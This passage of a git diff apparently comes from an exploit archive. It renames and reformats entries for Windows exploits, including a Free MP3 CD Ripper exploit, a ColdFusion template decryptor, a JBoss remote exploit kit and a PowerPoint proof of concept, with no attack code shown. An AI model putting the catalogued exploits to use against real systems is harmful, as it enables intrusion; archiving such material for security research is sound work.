platforms/windows/remote/9817.py rename to platforms/windows/dos/9817.py diff --git a/platforms/windows/dos/11987.txt b/platforms/windows/local/11987.txt similarity index 100% rename from platforms/windows/dos/11987.txt rename to platforms/windows/local/11987.txt diff --git a/platforms/windows/local/12012.txt b/platforms/windows/local/12012.txt index 859b4f78a..c873af431 100644 --- a/platforms/windows/local/12012.txt +++ b/platforms/windows/local/12012.txt @@ -1,8 +1,7 @@ # Exploit Title: Free MP3 CD Ripper 2.6 0 day # Date: 30/03/2010 # Author: Richard leahy -# Reference: -# http://www.exploit-db.com/exploits/11975 +# Reference: http://www.exploit-db.com/exploits/11975/ # Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html # Version: 2.6 # Tested on: Windows Xp Sp2 diff --git a/platforms/windows/local/19220.c b/platforms/windows/local/19220.c index 468c9dba0..8dfb1f1f4 100644 --- a/platforms/windows/local/19220.c +++ b/platforms/windows/local/19220.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/275/info A vulnerability in ColdFusion allows pages encrypted with the CFCRYPT.EXE utility to be decrypted. ColdFusion supports the ability to "encrypt" the CFML templates in an application or component, using the CFCRYPT.EXE utility, so they can be redistributed or sold without exposing the source code to casual viewing. A program that decrypts ColdFusion's encryption has been discovered. This will in effect make the source code for all this propietary CFML applications available to those with access to their encrypted form. +*/ /* CFDECRYPT: Decrypt Cold Fusion templates encrypted with CFCRYPT Matt Chapman diff --git a/platforms/windows/remote/2821.c b/platforms/windows/local/2821.c similarity index 100% rename from platforms/windows/remote/2821.c rename to platforms/windows/local/2821.c diff --git a/platforms/windows/remote/11420.py b/platforms/windows/remote/11420.py index 6fc257e38..d8fd1f366 100755 --- a/platforms/windows/remote/11420.py +++ b/platforms/windows/remote/11420.py @@ -3,8 +3,7 @@ # #Written by: Lincoln #Originally discovered by: loneferret -#Reference: -#http://www.exploit-db.com/exploits/11391 +#Reference: http://www.exploit-db.com/exploits/11391/ #Tested on: XPSP2 #root@box:~# ./ftpd.py 192.168.139.130 # diff --git a/platforms/windows/remote/17977.txt b/platforms/windows/remote/17977.txt index 69e083a1d..614674636 100644 --- a/platforms/windows/remote/17977.txt +++ b/platforms/windows/remote/17977.txt @@ -12,8 +12,7 @@ FILES: SSL SUPPORT FOR THE REMOTE EXPLOITS * synscan-modded.tar - THE SYNSCAN IS MODDED FOR SCANNING JBOSS (X-Powered-By TAG) ON -PORT 8080 ONLY. + THE SYNSCAN IS MODDED FOR SCANNING JBOSS (X-Powered-By TAG) ON PORT 8080 ONLY. * pnscan-1.11.tar.gz ORIGINAL PARALLEL NETWORK SCANNER (NO CREDITS HERE) diff --git a/platforms/windows/remote/20459.html b/platforms/windows/remote/20459.html index 234a0b8cb..a682e24f7 100644 --- a/platforms/windows/remote/20459.html +++ b/platforms/windows/remote/20459.html @@ -1,3 +1,4 @@ + diff --git a/platforms/windows/remote/28225.c b/platforms/windows/remote/28225.c index 05eee436b..5109e858b 100644 --- a/platforms/windows/remote/28225.c +++ b/platforms/windows/remote/28225.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/18993/info Microsoft PowerPoint is prone to multiple remote vulnerabilities. @@ -5,10 +6,9 @@ Microsoft PowerPoint is prone to multiple remote vulnerabilities. Three proof-of-concept exploit files designed to trigger vulnerabilities in PowerPoint have been released. It is currently unknown if these three exploit files pertain to newly discovered, unpublished vulnerabilities or if they exploit previously disclosed issues. These issues may allow remote attackers to cause crashes or to execute arbitrary machine code in the context of the affected application, but this has not been confirmed. - -This BID will be updated and potentially split into individual records as further analysis is completed. - + Microsoft PowerPoint 2003 is vulnerable to these issues; other versions may also be affected. +*/ /*----------------------------------------------------------------------------------------- * MS Power Point Unspecified vulnerability POC